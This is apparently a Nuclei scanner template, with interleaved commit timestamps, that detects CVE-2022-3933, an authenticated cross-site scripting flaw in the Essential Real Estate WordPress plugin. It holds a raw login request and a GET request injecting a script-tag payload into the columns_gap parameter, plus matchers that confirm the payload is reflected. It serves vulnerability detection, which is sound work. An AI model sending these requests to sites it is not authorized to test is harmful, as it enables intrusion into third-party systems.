2023-03-18 22:07:09 +00:00
id : CVE-2022-3933
info :
name : Essential Real Estate - Cross Site Scripting
author : r3Y3r53
severity : medium
description : |
The plugin does not sanitize and escapes some parameters, which could allow users with a role as low as Admin to perform Cross-Site Scripting attacks.
2023-03-19 14:53:56 +00:00
remediation : Fixed in version 3.9.6
2023-03-18 22:07:09 +00:00
reference :
- https://wpscan.com/vulnerability/6395f3f1-5cdf-4c55-920c-accc0201baf4
- https://wordpress.org/plugins/essential-real-estate/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2022-3933
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score : 5.4
cve-id : CVE-2022-3933
cwe-id : CWE-79
metadata :
verified : "true"
2023-03-20 07:05:15 +00:00
tags : wpscan,cve2022,authenticated,wordpress,wp-plugin,wp,essential-real-estate,cve,xss
2023-03-18 22:07:09 +00:00
requests :
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin-ajax.php?action=ere_property_gallery_fillter_ajax&columns_gap=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C!-- HTTP/1.1
Host : {{Hostname}}
cookie-reuse : true
matchers :
- type : dsl
dsl :
- 'status_code_2 == 200'
- 'contains(all_headers_2, "text/html")'
- 'contains(body_2, "><script>alert(document.domain)</script>")'
- 'contains(body_2, "ere_property_gallery")'
condition : and